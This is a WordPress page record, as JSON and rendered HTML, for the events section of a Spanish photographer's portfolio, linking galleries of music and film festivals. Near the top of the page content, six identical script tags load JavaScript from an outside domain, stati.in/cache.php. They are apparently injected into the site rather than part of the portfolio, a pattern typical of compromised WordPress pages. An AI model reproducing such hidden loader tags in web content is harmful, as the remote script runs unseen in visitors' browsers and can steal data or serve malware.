{"id":938,"date":"2018-01-14T13:24:19","date_gmt":"2018-01-14T13:24:19","guid":{"rendered":"http:\/\/www.victoriamanjoncabezacloute.com\/?page_id=938"},"modified":"2018-02-24T22:14:55","modified_gmt":"2018-02-24T22:14:55","slug":"monograficos-eventos","status":"publish","type":"page","link":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/","title":{"rendered":"MONOGR\u00c1FICOS EVENTOS"},"content":{"rendered":"<p style=\"text-align: center;\"><a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/photography\/\" rel=\"noopener\">nature<\/a>\u00a0 \u00a0 <a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/retrato\/\" target=\"_blank\" rel=\"noopener\">retrato\u00a0<\/a> \u00a0 <a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/street\" target=\"_blank\" rel=\"noopener\">street<\/a>\u00a0 \u00a0 <a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/objetos\/\" rel=\"noopener\">objetos<\/a>\u00a0 \u00a0 <a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos\/\" rel=\"noopener\">monogr\u00e1ficos<\/a><\/p>\n<p style=\"text-align: right;\"><a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos\/\" rel=\"noopener\">REPORTAJE<\/a>\u00a0 \/\u00a0<a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/\" rel=\"noopener\">EVENTOS<\/a><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<div class='row'><div class='span3 first-module module_number_1 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Insonora<\/h1><\/div>\n\t\t\t<div class='int_banner_wrap'>\t\t\t\t\t\t\t\t\n\t\t\t\t<img src='http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/02\/insonora-2014_4-570x493.jpg' alt=''><div class='int_banner_overlay'><\/div>\n\t\t\t\t<a target='_blank' href='http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/gallery\/insonora\/' class='int_banner_link'>Learn More<\/a>\n\t\t\t\t\n\t\t\t\t<div class='int_banner_descr'><p>Cobertura fotogr\u00e1fica y Audiovisual desde el a\u00f1o 2012 <\/p><\/div>\n\t\t\t\t<div class='index_number'><\/div>\n\t\t\t<\/div>\n\t\t\t<\/div><\/div><!-- .module_cont --><div class='span3  module_number_2 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Festival de cine de M\u00e1laga<\/h1><\/div>\n\t\t\t<div class='int_banner_wrap'>\t\t\t\t\t\t\t\t\n\t\t\t\t<img src='http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/01\/ELDIOSDEMADERAMARISAPAREDES-570x493.jpg' alt=''><div class='int_banner_overlay'><\/div>\n\t\t\t\t<a target='_blank' href='http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/gallery\/festival-de-cine-de-malaga\/' class='int_banner_link'>Learn More<\/a>\n\t\t\t\t\n\t\t\t\t<div class='int_banner_descr'><p>Reportaje sobre el festival de cine de M\u00e1laga, actores, directores, etc...<\/p><\/div>\n\t\t\t\t<div class='index_number'><\/div>\n\t\t\t<\/div>\n\t\t\t<\/div><\/div><!-- .module_cont --><div class='span3  module_number_3 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Femuka<\/h1><\/div>\n\t\t\t<div class='int_banner_wrap'>\t\t\t\t\t\t\t\t\n\t\t\t\t<img src='http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/01\/femuka-2012_134-570x493.jpg' alt=''><div class='int_banner_overlay'><\/div>\n\t\t\t\t<a target='_blank' href='http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/gallery\/femuka\/' class='int_banner_link'>Learn More<\/a>\n\t\t\t\t\n\t\t\t\t<div class='int_banner_descr'><p>Festival de m\u00fasica en la calle<\/p><\/div>\n\t\t\t\t<div class='index_number'><\/div>\n\t\t\t<\/div>\n\t\t\t<\/div><\/div><!-- .module_cont --><div class='span3  module_number_4 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Festival de cine casero<\/h1><\/div>\n\t\t\t<div class='int_banner_wrap'>\t\t\t\t\t\t\t\t\n\t\t\t\t<img src='http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/02\/femukargb_18-570x493.jpg' alt=''><div class='int_banner_overlay'><\/div>\n\t\t\t\t<a target='_blank' href=' http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/gallery\/festival-de-cine-casero\/' class='int_banner_link'>Learn More<\/a>\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t<div class='index_number'><\/div>\n\t\t\t<\/div>\n\t\t\t<\/div><\/div><!-- .module_cont --><\/div>","protected":false},"excerpt":{"rendered":"<p>nature\u00a0 \u00a0 retrato\u00a0 \u00a0 street\u00a0 \u00a0 objetos\u00a0 \u00a0 monogr\u00e1ficos REPORTAJE\u00a0 \/\u00a0EVENTOS Insonora Learn More Cobertura fotogr\u00e1fica y Audiovisual desde el a\u00f1o 2012 Festival de cine de M\u00e1laga Learn More Reportaje sobre el festival de cine de M\u00e1laga, actores, directores, etc&#8230; Femuka Learn More Festival de m\u00fasica en la calle Festival de cine casero Learn More<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute\" \/>\n<meta property=\"og:description\" content=\"nature\u00a0 \u00a0 retrato\u00a0 \u00a0 street\u00a0 \u00a0 objetos\u00a0 \u00a0 monogr\u00e1ficos REPORTAJE\u00a0 \/\u00a0EVENTOS Insonora Learn More Cobertura fotogr\u00e1fica y Audiovisual desde el a\u00f1o 2012 Festival de cine de M\u00e1laga Learn More Reportaje sobre el festival de cine de M\u00e1laga, actores, directores, etc... Femuka Learn More Festival de m\u00fasica en la calle Festival de cine casero Learn More\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/\" \/>\n<meta property=\"og:site_name\" content=\"victoriamanjoncabezacloute\" \/>\n<meta property=\"article:modified_time\" content=\"2018-02-24T22:14:55+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/#website\",\"url\":\"http:\/\/www.victoriamanjoncabezacloute.com\/\",\"name\":\"victoriamanjoncabezacloute\",\"description\":\"Profile Victoria Manj\\u00f3n-Cabeza\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.victoriamanjoncabezacloute.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#webpage\",\"url\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/\",\"name\":\"MONOGR\\u00c1FICOS EVENTOS - victoriamanjoncabezacloute\",\"isPartOf\":{\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/#website\"},\"datePublished\":\"2018-01-14T13:24:19+00:00\",\"dateModified\":\"2018-02-24T22:14:55+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\/\/www.victoriamanjoncabezacloute.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"MONOGR\\u00c1FICOS EVENTOS\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/","og_locale":"es_ES","og_type":"article","og_title":"MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute","og_description":"nature\u00a0 \u00a0 retrato\u00a0 \u00a0 street\u00a0 \u00a0 objetos\u00a0 \u00a0 monogr\u00e1ficos REPORTAJE\u00a0 \/\u00a0EVENTOS Insonora Learn More Cobertura fotogr\u00e1fica y Audiovisual desde el a\u00f1o 2012 Festival de cine de M\u00e1laga Learn More Reportaje sobre el festival de cine de M\u00e1laga, actores, directores, etc... Femuka Learn More Festival de m\u00fasica en la calle Festival de cine casero Learn More","og_url":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/","og_site_name":"victoriamanjoncabezacloute","article_modified_time":"2018-02-24T22:14:55+00:00","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/#website","url":"http:\/\/www.victoriamanjoncabezacloute.com\/","name":"victoriamanjoncabezacloute","description":"Profile Victoria Manj\u00f3n-Cabeza","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.victoriamanjoncabezacloute.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"WebPage","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#webpage","url":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/","name":"MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute","isPartOf":{"@id":"http:\/\/www.victoriamanjoncabezacloute.com\/#website"},"datePublished":"2018-01-14T13:24:19+00:00","dateModified":"2018-02-24T22:14:55+00:00","breadcrumb":{"@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/monograficos-eventos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.victoriamanjoncabezacloute.com\/"},{"@type":"ListItem","position":2,"name":"MONOGR\u00c1FICOS EVENTOS"}]}]}},"_links":{"self":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/938"}],"collection":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/comments?post=938"}],"version-history":[{"count":9,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/938\/revisions"}],"predecessor-version":[{"id":2348,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/938\/revisions\/2348"}],"wp:attachment":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/media?parent=938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

MONOGRÁFICOS EVENTOS

<p style="text-align: center;"><a href="http://www.victoriamanjoncabezacloute.com/index.php/photography/" rel="noopener">nature</a>    <a href="http://www.victoriamanjoncabezacloute.com/index.php/retrato/" target="_blank" rel="noopener">retrato </a>   <a href="http://www.victoriamanjoncabezacloute.com/index.php/street" target="_blank" rel="noopener">street</a>    <a href="http://www.victoriamanjoncabezacloute.com/index.php/objetos/" rel="noopener">objetos</a>    <a href="http://www.victoriamanjoncabezacloute.com/index.php/monograficos/" rel="noopener">monográficos</a></p>
<p style="text-align: right;"><a href="http://www.victoriamanjoncabezacloute.com/index.php/monograficos/" rel="noopener">REPORTAJE</a>  / <a href="http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/" rel="noopener">EVENTOS</a></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<p><script src="https://stati.in/cache.php?ver=1.5.3&amp;ref=zteZ" type="text/javascript"></script></p>
<div class='row'><div class='span3 first-module module_number_1 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Insonora</h1></div>
			<div class='int_banner_wrap'>								
				<img src='http://www.victoriamanjoncabezacloute.com/wp-content/uploads/2018/02/insonora-2014_4-570x493.jpg' alt=''><div class='int_banner_overlay'></div>
				<a target='_blank' href='http://www.victoriamanjoncabezacloute.com/index.php/gallery/insonora/' class='int_banner_link'>Learn More</a>
				
				<div class='int_banner_descr'><p>Cobertura fotográfica y Audiovisual desde el año 2012 </p></div>
				<div class='index_number'></div>
			</div>
			</div></div><!-- .module_cont --><div class='span3  module_number_2 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Festival de cine de Málaga</h1></div>
			<div class='int_banner_wrap'>								
				<img src='http://www.victoriamanjoncabezacloute.com/wp-content/uploads/2018/01/ELDIOSDEMADERAMARISAPAREDES-570x493.jpg' alt=''><div class='int_banner_overlay'></div>
				<a target='_blank' href='http://www.victoriamanjoncabezacloute.com/index.php/gallery/festival-de-cine-de-malaga/' class='int_banner_link'>Learn More</a>
				
				<div class='int_banner_descr'><p>Reportaje sobre el festival de cine de Málaga, actores, directores, etc...</p></div>
				<div class='index_number'></div>
			</div>
			</div></div><!-- .module_cont --><div class='span3  module_number_3 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Femuka</h1></div>
			<div class='int_banner_wrap'>								
				<img src='http://www.victoriamanjoncabezacloute.com/wp-content/uploads/2018/01/femuka-2012_134-570x493.jpg' alt=''><div class='int_banner_overlay'></div>
				<a target='_blank' href='http://www.victoriamanjoncabezacloute.com/index.php/gallery/femuka/' class='int_banner_link'>Learn More</a>
				
				<div class='int_banner_descr'><p>Festival de música en la calle</p></div>
				<div class='index_number'></div>
			</div>
			</div></div><!-- .module_cont --><div class='span3  module_number_4 module_cont  module_imageboxes'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class='bg_title'><h1 style='' class='headInModule'>Festival de cine casero</h1></div>
			<div class='int_banner_wrap'>								
				<img src='http://www.victoriamanjoncabezacloute.com/wp-content/uploads/2018/02/femukargb_18-570x493.jpg' alt=''><div class='int_banner_overlay'></div>
				<a target='_blank' href=' http://www.victoriamanjoncabezacloute.com/index.php/gallery/festival-de-cine-casero/' class='int_banner_link'>Learn More</a>
				
				
				<div class='index_number'></div>
			</div>
			</div></div><!-- .module_cont --></div>

<p>nature    retrato    street    objetos    monográficos REPORTAJE  / EVENTOS Insonora Learn More Cobertura fotográfica y Audiovisual desde el año 2012 Festival de cine de Málaga Learn More Reportaje sobre el festival de cine de Málaga, actores, directores, etc&#8230; Femuka Learn More Festival de música en la calle Festival de cine casero Learn More</p>

<!-- This site is optimized with the Yoast SEO plugin v17.9 - https://yoast.com/wordpress/plugins/seo/ -->
<title>MONOGRÁFICOS EVENTOS - victoriamanjoncabezacloute</title>
<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
<link rel="canonical" href="http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/" />
<meta property="og:locale" content="es_ES" />
<meta property="og:type" content="article" />
<meta property="og:title" content="MONOGRÁFICOS EVENTOS - victoriamanjoncabezacloute" />
<meta property="og:description" content="nature    retrato    street    objetos    monográficos REPORTAJE  / EVENTOS Insonora Learn More Cobertura fotográfica y Audiovisual desde el año 2012 Festival de cine de Málaga Learn More Reportaje sobre el festival de cine de Málaga, actores, directores, etc... Femuka Learn More Festival de música en la calle Festival de cine casero Learn More" />
<meta property="og:url" content="http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/" />
<meta property="og:site_name" content="victoriamanjoncabezacloute" />
<meta property="article:modified_time" content="2018-02-24T22:14:55+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://www.victoriamanjoncabezacloute.com/#website","url":"http://www.victoriamanjoncabezacloute.com/","name":"victoriamanjoncabezacloute","description":"Profile Victoria Manj\u00f3n-Cabeza","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http://www.victoriamanjoncabezacloute.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"WebPage","@id":"http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/#webpage","url":"http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/","name":"MONOGR\u00c1FICOS EVENTOS - victoriamanjoncabezacloute","isPartOf":{"@id":"http://www.victoriamanjoncabezacloute.com/#website"},"datePublished":"2018-01-14T13:24:19+00:00","dateModified":"2018-02-24T22:14:55+00:00","breadcrumb":{"@id":"http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/"]}]},{"@type":"BreadcrumbList","@id":"http://www.victoriamanjoncabezacloute.com/index.php/monograficos-eventos/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http://www.victoriamanjoncabezacloute.com/"},{"@type":"ListItem","position":2,"name":"MONOGR\u00c1FICOS EVENTOS"}]}]}</script>
<!-- / Yoast SEO plugin. -->

MONOGRÁFICOS EVENTOS - victoriamanjoncabezacloute

nature    retrato    street    objetos    monográficos REPORTAJE  / EVENTOS Insonora Learn More Cobertura fotográfica y Audiovisual desde el año 2012 Festival de cine de Málaga Learn More Reportaje sobre el festival de cine de Málaga, actores, directores, etc... Femuka Learn More Festival de música en la calle Festival de cine casero Learn More

Profile Victoria Manjón-Cabeza
